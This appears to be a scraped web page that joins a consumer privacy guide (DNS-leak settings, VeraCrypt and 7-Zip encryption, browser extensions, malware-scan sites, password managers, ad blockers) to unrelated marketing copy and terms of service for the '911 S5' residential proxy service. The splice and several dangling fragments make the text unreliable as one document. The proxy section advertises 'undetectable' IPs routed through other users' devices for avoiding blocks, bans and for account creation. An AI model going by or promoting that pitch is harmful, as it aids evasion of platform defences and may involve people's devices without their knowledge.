We continue to talk about the issues of ensuring personal security, anonymity and secrecy on the Internet on our own. Here are some more useful tips, settings and tricks for a home and partly corporate computer that you can perform on your own.

8. Configuring the VPN connection to block DNS leaks

To keep DNS requests secure over VPN connections, it is highly recommended that you disable Smart Multi-Homed Name Resolution in Windows 8.1 and Windows 10 so that DNS requests are not forwarded outside of your secure VPN connection.

8.1 Setting in Windows 8 and 8.1

The following registry tweak can only be applied on Windows 8 and 8.1 systems; it does not work on Windows 10.

• Open the Registry Editor: press the Windows key, then type regedit.exe and press Enter. A User Account Control prompt will appear; confirm it.
• Follow the path: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient.
• If the DisableSmartNameResolution parameter already exists, make sure its value is 1.
• Otherwise, right-click the DNSClient directory and select New > DWORD (32-bit) Value from the menu.
• Name the parameter DisableSmartNameResolution. Set the value to 1. 
You can re-enable the function at any time by simply setting the value to 0 or deleting the parameter.
• Go to the path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters.
• If the DisableParallelAandAAAA parameter already exists, make sure its value is 1.
• Otherwise, right-click the Parameters directory and select New > DWORD (32-bit) Value from the menu.
• Name the parameter DisableParallelAandAAAA. Set the value to 1. You can re-enable the function at any time by simply setting the value to 0 or deleting the parameter.
• You can then close Registry Editor and restart Windows to apply the changes.

8.2 Setting up Windows 10

The following method works in all versions of Windows 10, as well as Windows 8 and 8.1. It uses the "Turn off smart multi-homed name resolution" policy.

• Open the Local Group Policy Editor: press the Windows key, then type gpedit.msc and press Enter.
• Go to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off smart multi-homed name resolution.
• Set the policy status to Enabled to disable this feature in the system.
• Restart Windows to apply the changes.

9. The easiest ways to protect files and folders that can be found on a USB stick

Here are a few simple tips and ways to ensure the confidentiality of your personal files.

9.1 Protecting individual files with a password

Setting up password protection for individual MS Word files.

If you only need to protect important individual documents and don't need to encrypt entire folders, you can simply limit yourself to setting up password protection for individual files.

Most programs, such as Word and Excel, have the option to save data with a password. For example, if the document you want is open in Microsoft Word, you can go to File > Info, choose Protect Document, then choose Encrypt with Password.

It remains only to define a strong password and confirm it. 
Remember to save the document and to memorize or write down the password.

9.2 VeraCrypt Encrypted File Container

VeraCrypt cryptographic security software can be used as a portable application and run directly from a USB stick. The program requires administrator rights. The program supports the creation of a virtual encrypted hard disk that can be mounted like a physical hard disk.

VeraCrypt currently uses real-time encryption with a variety of 256-bit algorithms, including AES, Serpent and Twofish and combinations thereof.

Download the portable version of VeraCrypt and unzip it to a USB stick. When you launch the application, a list of available drive letters will be displayed. Select a letter and click "Create Volume". The VeraCrypt Volume Creation Wizard will start.

To create an encrypted virtual disk in a file, select the Create Encrypted File Container option and click Next.

The next step is to choose the type of volume: regular or hidden. Using a hidden volume reduces the risk of someone forcing you to reveal your password. In our example, we are creating a regular volume. Next, select the location of the encrypted disk - Removable Disk.

Configure encryption and specify the size of the volume (it must not exceed the size of the USB drive). Then select the encryption and hashing algorithm; you can use the default settings. Then set a password for the volume. In the next step, your random mouse movements will determine the cryptographic strength of the encryption.

After encryption is complete, every time you plug the USB drive into your computer, you can launch the VeraCrypt hosted on it and mount the encrypted file container to access the data.

9.3 Encrypt USB Drive Completely

VeraCrypt also supports encryption of entire partitions and storage devices.

Download VeraCrypt and install the program on your computer. When starting the application, a list of available drive letters will be displayed. Select a letter and click "Create Volume". 
The VeraCrypt Volume Creation Wizard will start.

To encrypt the entire USB drive, select the Encrypt non-system partition / disk option and click Next.

The next step is to choose the type of volume: regular or hidden. Using a hidden volume reduces the risk of someone forcing you to reveal your password. In our example, we will create a regular volume. On the next screen of the wizard, you need to select a device, i.e. our removable USB drive, then click "OK" and "Next".

To encrypt your entire USB drive, select Encrypt Partition In Place and click Next. VeraCrypt will warn you that you should back up your data - if something goes wrong during encryption, you can restore access to your files. Then select the encryption and hashing algorithm; you can use the default settings. Then set a password for the volume. In the next step, random mouse movements will determine the cryptographic strength of the encryption.

Then select the cleaning mode. The more rewriting cycles, the more reliable the cleaning. In the final step, select Encrypt to start the encryption process.

After encryption is complete, every time you plug the USB drive into your computer, you will need to mount it using VeraCrypt to access the data.

9.4 Password protection of the archive

Modern archivers like the free 7-Zip support AES-256 encrypted compression and password protection.

Install 7-Zip, then right-click a file or folder on your USB drive and select 7-Zip > Add to Archive. In the "Add to archive" window, select the archive format and set a password. Click "OK" to start the archiving and encryption process.

10. Improving protection and privacy of Chromium-based browsers

All modern Chromium-based browsers have a Google Safe Browsing blacklist to protect users from known dangerous sites. 
They all have built-in sandbox isolation that makes them less vulnerable to attack, and they update quickly when any vulnerabilities are found. If you don't want to trust Google with your personal information by using the Google Chrome web browser, there are several alternatives.

10.1 Useful extensions

Web of Trust (WOT) - after installing this extension, if you accidentally stumble upon a potentially unsafe site, WOT will cover the page with a warning screen and wait for your decision to stay or leave the site. If you combine this with your own common sense, you will be protected from many of the dangers on the web.

Bitdefender TrafficLight - after installing this extension, if you come across a dangerous website blacklisted by Bitdefender, the plugin will block the page from loading. Bitdefender TrafficLight allows you to block malicious sites, phishing and fake sites.

Adblock Plus for Google Chrome - this extension allows you to subscribe to updates from many different filter lists to help you block unwanted or malicious website content. You can subscribe to any of the lists available, but keep in mind that subscribing to too many of them will slow down your browsing. I recommend subscribing to the EasyPrivacy + EasyList combo and the Malware Domains combo.

ScriptSafe - this add-on blocks the execution of almost all scripts and other potentially dangerous content. This means that even if you come across a dangerous site, you cannot be attacked unless you manually add the scripts for that site to your whitelist. This way you are protected from malicious scripts and many privacy threats.

All Chromium-based browsers provide the ability to launch the browser in incognito mode. When you work in this mode, most of your online traces will be deleted as soon as the browser is closed. 
This is not enough to adequately protect your privacy, but it's already something.

What security changes should I make to improve my privacy?

Go to settings and click on the "Show advanced settings" link at the bottom of the page. In the "Personal Information" section, clear the "Use a prediction service to help complete searches" check box. Also, make sure that "Predict network activity to improve page load performance" is disabled in any browser.

For all browsers, you must also select the "Send a 'Do not track' request with your browser traffic" option. Google Chrome users may also want to disable the "Use a web service to help resolve navigation errors" option.

Now open "Content Settings" and select "Block third party cookie settings". This will prevent the download of cookies from a website other than the one you intend to visit. This way, almost all tracking cookies will be blocked with the least negative impact on your online experience.

In the "Privacy" section of the main settings page, check the "Don't tell sites how you got there (don't send the HTTP referrer header)" box. Please note, however, that this may cause problems with some sites and that some sites may need to be disabled in order for them to work properly.

• HTTPS Everywhere - This extension encourages many sites that have the ability to encrypt your connection to actually encrypt it. This way, your connection to these sites will be much safer.
• LastPass - A robust password manager that automatically inserts passwords and fills out forms. This not only helps protect your passwords and secrets from damage, but it also allows you to confidently create strong passwords and change them frequently.
• Do Not Track Me - This extension prevents third parties, advertising agencies and search engines from tracking which web pages you visit.

11. Tools used to analyze malicious links and files

Every day, malicious websites and attachments try to trick users into downloading dangerous content.
Fortunately, there are many online resources and tools that can help you figure out which sites are safe and which are a trap to steal your personal information and money.

Let's start with the well-known VirusTotal resource. When you receive an email with a ZIP archive, it will be helpful to check the attached file using this service.

There are a number of other web resources that help detect malicious files or links, namely:

• fortiguard.com/antivirus/virus_scanner.html - This site scans for malicious files and reports on potential security issues;
• hybrid-analysis.com - You can upload files to this site, but cannot work with archives;
• malwr.com/submission - Allows you to upload files and check which processes will be started. The service also shows how many VirusTotal antivirus engines have worked;
• metascan-online.com - Another site for checking potentially dangerous files that may contain malicious content;
• phishtank.com - Checks if the resource is contained in the database of known fraudulent sites;
• urlquery.net - (note that the net domain zone is used; the address in the com zone is registered by an unauthorized person) This service scans site links for malicious files and dangerous activity.

There are advanced tools for examining malicious web servers and their locations, or for tracking down dangerous emails. Again, many of the tools are available from the Internet; here are just a few of them:

• abuseipdb.com - A resource that checks the malicious activity of other sites (there is no HTTPS support);
• ipvoid.com - This site allows you to check if a specific IP address has been involved in malicious activity (there is no HTTPS support);
• mxtoolbox.com/Public/Tools/EmailHeaders.aspx - Enter the message header to determine where it was sent from;
• quttera.com/website-malware-scanner - Checks websites for malicious activity;
• virustracker.net - Analyzes if the IP address has been involved in malicious activity.
MxToolbox decrypts email message headers for diagnostic information

Checking a website using the urlQuery service

12. Password security

Password security is one of the problems that constantly worries the modern person. The confidentiality of personal life largely depends on the degree of secrecy of passwords. Today, access to almost any application, private and commercial information is password-based and requires registration.

The first step in keeping passwords secure is to avoid using a single word password. And not because a single-word password is too short, but because this password is very predictable. Did you know that there are databases used by hackers that contain all words in any language? The purpose of these databases is to help hackers guess passwords with simple word searches. This technique is called a dictionary attack, which can also take the form of a rainbow table attack.

12.1 Password manager

Password managers are applications that help us store and organize our passwords. The only password you need to remember is the password for the password manager itself.

• Sticky Password is a reliable password manager with local database and cloud sync. Supports Windows, Mac, Android, iPhone and iPad, bookmarks, creating and securely storing passwords, automatically signing in to websites, and filling out online forms.
• KeePass Password Safe is a free open source password manager for Windows. Allows you to store passwords in a well-encrypted database, access to which is closed with a master password or key file. 2018-11-02
• LastPass is a password manager app for popular web browsers, systems, and mobile devices.
The LastPass plugin makes visiting websites easier and safer.
• Kaspersky Password Manager is a password manager with cloud storage and data protection functions, autofilling authorization fields and data substitution, automatic data synchronization on all devices.
• Norton Password Manager is a free password manager that lets you log into the websites you visit quickly, easily, and securely. A simple password manager for your web browser, Android smartphone, iPhone and iPad.

12.2 Two-factor identification

Two-factor authentication is another obstacle to keeping your passwords secure. After entering the password, the authorization system will require an additional authentication method to log into your account. Specifically, the second verification factor could be the temporary digital code generated by the authentication app on your mobile device.

Access will be granted if the login (username or email address), password and secret code are entered correctly. Two-factor authentication is the most secure way to keep your passwords safe as access will not be granted without the additional credentials entered correctly.

13. Resources for testing end-point protection

A list of free and well-known tests that are used to simulate a malicious attack:

• Anti-malware Testfile - European Institute for Computer Anti-Virus Research
• Test your anti-Malware solution! - WICAR.org
• Security features check - Anti-Malware Testing Standards Organization
• SmartScreen Demo Pages - Microsoft
• Test Your Metal - Fortinet
• CheckMe - Check Point
• ShieldsUP! - Gibson Research Corp.
• LeakTest - Gibson Research Corp.
• Security Test Tool - SpyShelter

For a more complete assessment of the effectiveness of your protection, use links and files from several sources. Also, do not take the test results as final.

14. Blocking ads

• AdFender - Supports a wide range of web browsers including Chrome, Firefox, Microsoft Edge, Internet Explorer, Opera.
• Adguard for Windows is a multifunctional internet filter that blocks ads in many browsers and applications without the need to install extensions. In addition to the anti-banner, it includes anti-phishing, anti-tracking, parental control. For Comss.ru users, all functions are available free of charge for 6 months. The developer also offers apps for Android, Mac and iOS.
• Ad Muncher is a popular program for blocking online ads and pop-ups in most browsers. Supports creating your own filters. It became free with full functionality at the end of 2014 but hasn't been updated since then.

14.1 Extensions for Chrome, Firefox and Microsoft Edge

Currently, several major ad blockers offer extensions and add-ons for Chrome, Firefox and Edge. Let's list the most popular blockers:

• AdBlock for Chrome / AdBlock for Edge is the most popular ad blocker with over 200 million downloads. There was a Firefox version, but the extension was removed for unknown reasons. AdBlock allows you to receive ads from Youtube and Google searches, but these options are disabled by default.
• AdBlock Plus for Chrome / AdBlock Plus for Firefox / Adblock Plus for Edge is one of the most famous ad blockers, also very controversial because it was AdBlock Plus who originally introduced the practice of using ad whitelisting. The AdBlock Plus site also offers versions for Opera, Safari, Maxthon, Internet Explorer, and even Android.
• Adguard for Chrome / Adguard for Firefox / Adguard for Edge is easy to use and makes it easy to add additional scripts to block.
• Stop Reclame for Chrome is an effective solution to remove intrusive ads. An extension for Opera and Yandex Browser is also available.
• uBlock Origin for Chrome / uBlock Origin for Firefox / uBlock Origin for Edge is a promising script blocker for Chrome and Firefox. It has good optimization and minimal impact on processor and memory.
Not all ads are blocked by default, but you can add blacklists. The user can allow or block the extension to work on individual sites in advanced mode.

14.2 Alternative solutions for ad blocking

• Adguard DNS provides an easy way to filter ads through the domain name system. You can change DNS for a specific device or configure your router to filter internet traffic for all connected devices - Windows, Mac, Linux, Android, iOS.
• Adguard Home is a DNS server that blocks ads and tracking at the network level. Its function is to give you complete control over the network and all your devices without installing any client applications. At the same time, AdGuard Home offers a web interface with which you can easily manage the filtering process.
• Pi-Hole offers an advanced ad blocking solution on all devices connected to your home network. You will need a Raspberry Pi single board computer and some technical knowledge. All traffic is routed through a separate device that filters the content.

14.3 Using third-party DNS services

Your ISP provides DNS servers for you, although you don't have to use them. Instead, you can use third-party DNS servers that provide many features that your ISP does not have.

Third party DNS servers such as OpenDNS and Google Public DNS also offer protection that many ISP DNS servers have not yet implemented. For example, Google Public DNS supports DNSSEC to ensure correct signature and reliability of DNS queries. Your ISP's DNS servers may not have implemented these security features yet.

UnoDNS and Unblock-Us work in the same way and do not have this limitation, but on the other hand, you have to pay for them.

UnoDNS and Unblock-Us. Access to geo-blocked content

Namebench includes an option that checks DNS servers for censorship to determine if current DNS servers are being censored.

Namebench. Bypassing web censorship

Conclusion

In the end, we can say that you cannot remove the left fingerprints, but you can take preventive measures.
This will keep your data safe. If you are aware of all the possible risks, you can avoid them. You can start small. Install, for example, an ad blocker, use end-to-end encrypted apps, and only visit HTTPS sites. As you take these small steps, you will feel a huge difference.

That's all! If you do all these simple tricks, you can be a little more confident that your personal information, even if it is not very sensitive, will not be shared with anyone. In any case, ordinary amateurs will definitely not get it!

(c) cryptoworld.su
  8. https://911.re

911 S5 is the largest business residential proxy service. Access to millions of quality clean/fresh residential IPs in every city in the world with unmetered bandwidth and no expiration date.

WE PROVIDE YOU!

DEVELOPERS API
For maximum freedom we offer API access to proxy IPs by country, state, city, IP range, ZIP, ISP etc

FREE SOFTWARE
We offer software for using our proxy with many useful features for privacy protection, and its all free

WINDOWS OS
Our software supports all Windows OS from XP to Win 10

LIFETIME VALIDITY
Proxies balance have no expiration date on them, valid for lifetime in your account

SECURE ENCRYPTION
Strong encrypted communication to ensure highest anonymity with using SOCKS5 protocol

UNMETERED BANDWIDTH
Free yourself from bandwidth fees and send unlimited requests without per-gigabyte charges

BACKCONNECT SOCKS5 PROXIES
911 S5 OFFERS A RESIDENTIAL PROXY NETWORK THAT IS ROBUST BY DESIGN THAT FEATURES CLEAN/FRESH IP'S BECAUSE ITS A PRIVATE NETWORK FOCUSING ON QUALITY

Undetectable
Proxy peers in our network are from home standard ISP. Avoid blocks and bans and be seen as a regular visitor

Sales Intelligence
Understand who are the best customers for your service

Brand Protection
Monitor the web for proper use of your brand to protect your Intellectual Property, trade marks, and pricing strategy

Ad Verification
Ad networks use proxies to anonymously view their advertisers' landing pages to ensure they don't contain malware, or improper advertising

Self-Testing
Test your web properties from any city in the world

Hundreds of Uses
Our proxies are built for businesses that need complete freedom for their application.
Whether it's URL scraping, account creation or for SEO; our proxies can handle the task

Never get blocked
WHEN SENDING REQUESTS VIA RESIDENTIAL IPS, IT'S VIRTUALLY IMPOSSIBLE TO GET BLOCKED OR CLOAKED

Unlimited residential ips
MILLIONS OF FRESH CLEAN IPS UPDATE EACH DAY FROM THE 911 S5 PRIVATE NETWORK

In every city in the world
USE THE LARGEST PROXY NETWORK IN EVERY COUNTRY, CITY IN THE WORLD
South America
USA & Canada
Europe
Asia

PRICES FOR 911 S5 PROXIES
• All purchased proxies balance in your account are valid for lifetime, no expiry date!
• Using 1 proxy costs 1 proxy balance and you can use from any country, or city without limit!
• 99% of our proxies are already checked and available so you don't waste any proxies balance!
• Our software is compatible with any software, tools or games and third party applications!
• All our proxies use the socks5 protocol with strong encryption to ensure highest anonymity!

Terms of Service

911 PLATFORM TERMS OF USE

1. Your Acceptance

Welcome to the Terms of Use for 911. This is an agreement (“Agreement”) between International Media Ltd. (“911”), the owner and operator of 911.re and 911.gg website and any associated downloadable software or services offered (collectively the “Platform”) and you (“you”, “your” or “user(s)”), a user of the Platform.

Throughout this Agreement, the words “911,” “us,” “we,” and “our,” refer to our company, 911, as is appropriate in the context of the use of the words.

By clicking “I agree”, accessing, or using the Platform you agree to be bound by this Agreement and the Privacy Policy. We may amend our Terms of Use or the Privacy Policy and may not notify you when we do so. The current version of the Agreement is available on our website. You understand and agree that it is your obligation to review these terms and conditions from time to time in order to stay informed on current rules and obligations.
Your continued use of the Platform following any revision of the Platform or this Agreement constitutes your complete and irrevocable acceptance of any and all such changes. PLEASE BE AWARE THAT THERE ARE ARBITRATION AND CLASS ACTION PROVISIONS THAT MAY AFFECT YOUR RIGHTS. If you do not agree to the Terms of Use or the Privacy Policy please cease using our Platform immediately.

911 has developed, owns and offers a service which enables browsing the internet anonymously by redirecting users’ communication through other users' devices (the "System"). This is available for commercial use under this Agreement.

During the term of this Agreement 911 granted you to access and use the System solely for the purpose of Client's internal business operations.

911 reserves any and all rights not expressly granted in this Agreement, including, without limitation, any and all rights to the System.

2. User Information and Accounts

Users may be required to register on the Platform before accessing portions of the Platform. Your information will be collected and disclosed in accordance with our Privacy Policy. All users are required to provide truthful and accurate information when registering for our Platform and must be over the age of 18. Users may only register for one account per user. We reserve the right to verify all user credentials and to reject any users. You are entirely responsible for maintaining the confidentiality of your password and account and for any and all activities that occur under your account. You agree to notify 911 immediately of any unauthorized use of your account or any other breach of security. 911 will not be liable for any losses you incur as a result of someone else using your password or account, either with or without your knowledge.
If you are registering on behalf of your company, you represent and warrant that you are authorized by your company to create an account on your company’s behalf and you represent and warrant that you are authorized by your company to incur financial obligations and enter into legally binding agreements on behalf of your company.

3. Services

Through the Platform, 911 may offer proxy services or other services. The services may be provided via the internet or via downloadable software. Where you have downloaded a copy of our software you agree to abide by the EULA in addition to this Agreement. 911 uses reasonable efforts to provide these services to you; however, all services provided depend on innumerable factors and variables that are outside of 911's direct control. For these reasons, all services offered are not guaranteed and are offered “as-is”. Where you decide to use any services offered by the Platform, you agree that we make no guarantees including but not limited to access or efficiency. You understand that the services offered may have variance, be inexact, cause negative effects, or be otherwise incorrect. You agree to release us from any liability that we may incur for providing you any services offered via Platform. You agree that any service or any other information found on the Platform may be inaccurate, unsubstantiated or possibly even incorrect. You agree to release us from any liability that we may have to in relation to your use of our Platform.

4. User Content

Your ability to submit or transmit any information through the Platform, including but not limited to data, information, images, references, or any other information will be referred to as “User Content” throughout this Agreement. Please be aware that we are not required to host, display, migrate, or distribute any of your User Content and we may refuse to accept or transmit any User Content.
You agree that you are solely responsible for any User Content submitted and you release us from any liability associated with any User Content submitted. We provide industry standard security for our Platform but we cannot guarantee the absolute safety and security of any such User Content. Any User Content found to be in violation of this Agreement or that we determine to be harmful to the Platform may be modified, edited, or removed at our discretion.

When submitting any User Content to our Platform you represent and warrant that you own all rights to the User Content and you have paid for or otherwise have permission to use any User Content submitted. Furthermore, you represent and warrant that all User Content is legal and the User Content does not interfere with any third party rights or obligations.

When you submit any User Content to us, you grant 911, its partners, affiliates, users, representatives and assigns a non-exclusive, limited, fully-paid, royalty-free, revocable, world-wide, universal, transferable, assignable license to display, distribute, store, broadcast, transmit, reproduce, modify, prepare derivative works, or use and reuse all or part of your User Content for the purposes of providing you any services associated with the Platform. Additionally, you grant to 911 a worldwide, perpetual, irrevocable, royalty-free license to use and incorporate into the Platform any suggestion, enhancement request, recommendation, correction or other feedback provided by you relating to the operation of our Platform.

5. Privacy Policy

We value your privacy and understand your privacy concerns. Our Privacy Policy is incorporated into this Agreement, and it governs your access to and use of the Platform. Please review our Privacy Policy so that you may understand our privacy practices.
All information we collect is subject to our Privacy Policy, and by using the Platform you consent to all actions taken by us with respect to your information in compliance with the Privacy Policy. You further understand that any information collected by 911 may be transferred outside of your resident jurisdiction and/or other countries for storage, processing and use by 911 and its affiliates.

6. Platform Availability

Although we try to provide continuous availability to you, we do not guarantee that the Platform will always be available, work, or be accessible at any particular time. Additionally, 911 is under no obligation to provide the services to any users and may suspend a user’s access to the Platform at any time and at our discretion. Only users who are eligible to use our Platform may do so and we may refuse service or terminate your access at any time. We cannot guarantee that anything found on our Platform will work to the functionality desired by you or give you any desired results.

7. Modification of Platform

We reserve the right to alter, modify, update, or remove our Platform at any time. We may conduct such modifications to our Platform for security reasons, intellectual property, legal reasons, or various other reasons at our discretion, and we are not required to explain such modifications. For example, we may provide updates to fix security flaws, or to respond to legal demands. Please note that this is a non-binding illustration of how we might exercise our rights under this section, and nothing in this section obligates us to take measures to update the Platform for security, legal or other purposes.

8. Platform Restrictions

You agree to abide by all restrictions set forth in our EULA when using and accessing our Platform.

9. Payments

Portions of the Platform or specific services offered may require payment and you agree to pay for all costs, fees, and taxes listed.
User authorizes 911 or its third party payment processors to charge their method of payment at the time of purchase. Please be aware that purchases are completed via our third party payment processors. Where applicable, you must agree to our third party payment processors terms and conditions for processing payments. All information that you provide in connection with a purchase or transaction must be accurate, complete, and current. Where you have failed to pay or where payments are overdue, 911 may suspend or terminate your access to any services of the Platform, without liability to us.

10. Taxes

Where 911 does not charge you taxes for any purchases, you agree to pay any and all applicable taxes for your use and purchase of the services. Additionally, where requested by us, you agree to provide us tax documentation to support any claims of on-time tax payment.

11. Pricing and Price Increases

The pricing for any services is listed on 911 Platform. 911 may increase the price of any services, at our discretion and we reserve the right to do so at any time. In the event of a price increase, 911 shall notify you and you will have the chance to accept or reject any price increase. Please notify us if you intend to reject a price increase. Where you have rejected a price increase, you may be unable to access portions of the Platform. You agree that 911 has no obligation to offer any services for the price originally offered to you at sign up.

12. Refunds

As we offer online services, we cannot offer refunds for any paid services. Please be aware that all payments are final.

13. Crypto Currency Payments

Where you use any crypto currency to pay for any services, you are solely responsible for ensuring and verifying that such payments are deposited correctly. We cannot be responsible for any payments that are lost in transmission or paid more than the Order Amount or sent to incorrect wallet addresses.
Additionally, you must verify that all payments are fully paid for before the expiration of your order and that you have paid the correct amount for any services. We will not be able to refund any crypto currency payments and you are solely responsible for verifying any crypto payment amounts.

14. Intellectual Property

The name “911 S5”, 911.gg, 911.re, the 911 Platform along with the design of 911 Platform and any text, writings, images, templates, scripts, graphics, interactive features and any trademarks or logos contained therein ("Marks"), are owned by or licensed to 911, subject to copyright and other intellectual property rights under international laws and international conventions. 911 reserves all rights not expressly granted in and to the Platform. You agree to not engage in the use, copying, or distribution anything contained within the Platform unless we have given express written permission.

15. Idea Submission

911 or any of its employees do not accept or consider unsolicited ideas, including but not limited to ideas relating to processes, technologies, product enhancements, or product names. Please do not submit any unsolicited ideas, content, artwork, suggestions, or other works (“Submissions”) in any form to 911. The sole purpose of this policy is to avoid potential misunderstandings or disputes when 911’s products or services might seem similar to ideas you submitted to 911. If, despite our request that you not send us your ideas, you agree to the following: (1) your Submissions and their contents will automatically become the property of 911, without any compensation to you; (2) 911 may use or redistribute the Submissions and their contents for any purpose and in any way; (3) there is no obligation for 911 to review the Submission; and (4) there is no obligation to keep any Submissions confidential.

16. Disclaimer

THE PLATFORM AND ALL SERVICES ARE PROVIDED ON AN "AS IS", "AS AVAILABLE" AND "WITH ALL FAULTS" BASIS.
TO THE FULLEST EXTENT PERMISSIBLE BY LAW, NEITHER 911, NOR ANY OF OUR EMPLOYEES, MANAGERS, OFFICERS, ASSIGNS OR AGENTS MAKE ANY REPRESENTATIONS OR WARRANTIES OR ENDORSEMENTS OF ANY KIND WHATSOEVER, EXPRESS OR IMPLIED, AS TO: (1) THE PLATFORM; (2) ANY INFORMATION PROVIDED VIA THE PLATFORM; (3) THE SERVICES, OR (4) SECURITY ASSOCIATED WITH THE TRANSMISSION OF INFORMATION TO 911, OR VIA THE PLATFORM. IN ADDITION, WE DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, LOST PROFITS, NON-INFRINGEMENT, TITLE, CUSTOM, TRADE, QUIET ENJOYMENT, SYSTEM INTEGRATION AND FREEDOM FROM COMPUTER VIRUS.

911 DOES NOT REPRESENT OR WARRANT THAT THE PLATFORM INCLUDING THE SERVICES WILL BE ERROR-FREE OR UNINTERRUPTED; THAT DEFECTS WILL BE CORRECTED; OR THAT THE PLATFORM OR THE SERVER THAT MAKES THE PLATFORM AVAILABLE IS FREE FROM ANY HARMFUL COMPONENTS. 911 DOES NOT MAKE ANY REPRESENTATIONS OR WARRANTIES THAT THE SERVICES OFFERED ARE ACCURATE, COMPLETE, OR USEFUL. 911 DOES NOT WARRANT THAT YOUR USE OF THE PLATFORM IS LAWFUL IN ANY PARTICULAR JURISDICTION, AND 911 SPECIFICALLY DISCLAIMS ANY SUCH WARRANTIES.

17. Limitation of Liability

IN NO EVENT SHALL 911, ITS OFFICERS, DIRECTORS, EMPLOYEES, OR AGENTS, BE LIABLE TO YOU FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT 911 IS ADVISED OF THE POSSIBILITY OF SUCH DAMAGES, RESULTING FROM (1) YOUR USE OR INABILITY TO USE THE PLATFORM OR ANY ERRORS, MISTAKES, OR INACCURACIES FOUND WITHIN THE PLATFORM, (2) ANY PERSONAL INJURY OR PROPERTY DAMAGE, OF ANY NATURE WHATSOEVER, RESULTING FROM YOUR ACCESS TO AND USE OF OUR PLATFORM INCLUDING THE SERVICES, (3) ANY INTERRUPTION, MISINFORMATION, INCOMPLETE INFORMATION, OR CESSATION OF TRANSMISSION TO OR FROM OUR PLATFORM TO YOU, (4) ANY BUGS, VIRUSES, TROJAN HORSES, OR THE LIKE, WHICH MAY BE TRANSMITTED TO OR THROUGH OUR PLATFORM VIA A THIRD PARTY, (5) ANY FAILURE OR DISRUPTION OF SERVICES WHETHER INTENTIONAL OR UNINTENTIONAL, OR (6) ANY ACTION TAKEN IN CONNECTION WITH ANY THIRD PARTY COPYRIGHT OR OTHER INTELLECTUAL PROPERTY OWNERS. THE FOREGOING LIMITATION OF LIABILITY SHALL APPLY TO THE FULLEST EXTENT PERMITTED BY LAW IN THE APPLICABLE JURISDICTION. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OR EXCLUSION OF LIABILITY FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THE ABOVE LIMITATION OR EXCLUSION MAY NOT APPLY TO YOU. SPECIFICALLY, IN THOSE JURISDICTIONS NOT ALLOWED, WE DO NOT DISCLAIM LIABILITY FOR: (1) DEATH OR PERSONAL INJURY CAUSED BY 911’S NEGLIGENCE OR THAT OF ANY OF ITS OFFICERS, EMPLOYEES OR AGENTS; (2) FRAUDULENT MISREPRESENTATION; OR (3) ANY LIABILITY WHICH IT IS NOT LAWFUL TO EXCLUDE EITHER NOW OR IN THE FUTURE. WHERE A TOTAL DISCLAIMER OF LIABILITY IS DISALLOWED YOU AGREE THAT OUR TOTAL LIABILITY TO YOU SHALL NOT EXCEED THE AMOUNTS YOU HAVE PAID IN THE PAST ONE (1) MONTH TO USE OUR PLATFORM INCLUDING OUR SERVICES.

18. Indemnity

You agree to defend, indemnify and hold harmless 911, its officers, directors, employees and agents, from and against any and all claims, damages, obligations, losses, liabilities, costs or debt, and expenses (including but not limited to attorney's fees) arising from:
• your use of and access to 911 Platform including any services;
• your violation of any term of this Agreement;
• your interactions with any other users or third parties; or
• your violation of any third party right, including without limitation any copyright, property, or contractual right.

This defense and indemnification obligation will survive this Agreement and your use of 911 Platform. You also agree that you have a duty to defend us against such claims and we may require you to pay for an attorney(s) of our choice in such cases. You agree that this indemnity extends to requiring you to pay for our reasonable attorneys’ fees, court costs, and disbursements. In the event of a claim such as one described in this paragraph, we may elect to settle with the party/parties making the claim and you shall be liable for the damages as though we had proceeded with a trial.

19. Counter Notice

In the event that you receive a notification from 911 stating content posted by you has been taken down, you may respond by filing a counter-notice. Your counter-notice must contain the following:
• Your name, address, email and physical or electronic signature.
• The notification reference number (if applicable).
• Identification of the material and its location before it was removed.
• A statement under penalty of perjury that the material was removed by mistake or misidentification.
• Your consent to US federal court jurisdiction.
• Your consent to accept service of process from the party who submitted the takedown notice.

Please be aware that we may not take any action regarding your counter-notice unless your notification strictly complies with the foregoing requirements.
Please send this counter-notice in accordance with the takedown notice instructions above.

20. Choice of Law

This Agreement shall be governed by the laws in force in the British Virgin Islands. The offer and acceptance of this contract is deemed to have occurred in the British Virgin Islands.

21. Disputes

Any dispute, controversy, or claim arising out of, or relating to, or in connection with this Agreement, including with respect to the formation, applicability, breach, termination, invalidity, enforceability or any dispute regarding non-contractual obligations arising out of or relating to such obligations shall be submitted to confidential arbitration at the BVW International Arbitration Centre located within the British Virgin Islands. The arbitration shall be conducted under BVI IAC Arbitration Rules (“Rules”) (in force at the time of submission of a Notice of Arbitration and as may be amended from time to time). One arbitrator shall be agreed upon by the parties, and where the parties cannot come to an agreement, an arbitrator shall be selected pursuant to the Rules. Arbitration shall be conducted in English and the arbitrator's award shall be final and binding and may be entered as a judgment in any court of competent jurisdiction. Each party shall be responsible for their own arbitration fees and costs. To the fullest extent permitted by applicable law, no arbitration under this Agreement shall be joined to an arbitration involving any other party subject to this Agreement, whether through class action proceedings or otherwise. Where allowed by the Rules, 911 may make any and all appearances telephonically or electronically. You agree that regardless of any statute or law to the contrary, any claim or cause of action arising out of, related to or connected with the use of the Platform or this Agreement must be filed within one (1) year after such claim or cause of action arose or be forever banned.
Notwithstanding the foregoing, either party may seek equitable relief to protect its interests (including but not limited to injunctive relief), or make a claim for nonpayment, in a court of appropriate jurisdiction, and issues of intellectual property ownership or infringement may be decided only by a court of appropriate jurisdiction and not by arbitration. In the event that the law does not permit the above mentioned dispute to be resolved through arbitration or if this arbitration agreement is unenforceable, you agree that any actions and disputes shall be brought solely in a court of competent jurisdiction located within Tortola, British Virgin Islands.

22. Class Action Waiver
You and 911 agree that any proceedings to resolve or litigate any dispute whether through a court of law or arbitration shall be solely conducted on an individual basis. You agree that you will not seek to have any dispute heard as a class action, representative action, collective action, or private attorney general action.

